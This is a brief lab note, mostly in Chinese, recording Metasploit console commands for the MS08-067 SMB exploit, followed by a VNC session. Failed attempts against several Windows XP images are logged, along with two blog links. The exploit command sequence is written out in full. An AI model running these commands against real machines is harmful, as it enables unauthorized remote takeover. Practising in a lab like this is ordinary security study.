search ms08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.227  目标靶机
show targets 显示有漏洞的操作系统
set target 34
exploit
run vnc

下载靶机  
Windows XP Professional with Service Pack 3 (x86) - CD (Chinese-Simplified) 2008-05-01   失败   2022 nian 12 9 chenggong 
换 成 Windows XP Professional with Service Pack 2 (Simplified Chinese) 这个 2004-08-26    失败

换成 Windows XP Professional (Simplified Chinese)  2001-10-30                             失败


https://blog.csdn.net/xyx107/article/details/79151025

失败 

一次失败后  445口 就会关闭 虽然netstat能查出来

https://blog.csdn.net/max_ii_min/article/details/104380097
